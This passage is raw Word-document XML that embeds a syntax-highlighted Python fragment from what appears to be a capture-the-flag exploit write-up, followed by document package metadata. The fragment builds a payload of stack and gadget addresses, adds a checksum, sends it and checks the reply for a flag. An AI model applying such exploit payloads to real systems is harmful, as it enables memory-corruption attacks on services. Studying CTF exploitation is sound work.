        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\xb2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fit(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># stack address of the flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800FE0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> i],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># stack address of magic gadget</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">116</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x167D2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># puts address</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">148</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1673C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload.ljust(B2_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"X"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> p32(zlib.crc32(payload))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.send(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        recvd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> io.recvall(timeout</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"flag{"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> recvd:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            log.success(recvd.decode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            exit(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>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image" Target="media/rId32.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId36"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324D1-E3B5-4BA2-A215-7EC23485304B}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C8E74B4C-C92A-48DA-AB95-4F60F8495BC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2023-05-12T15:42:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-12T15:42:51Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>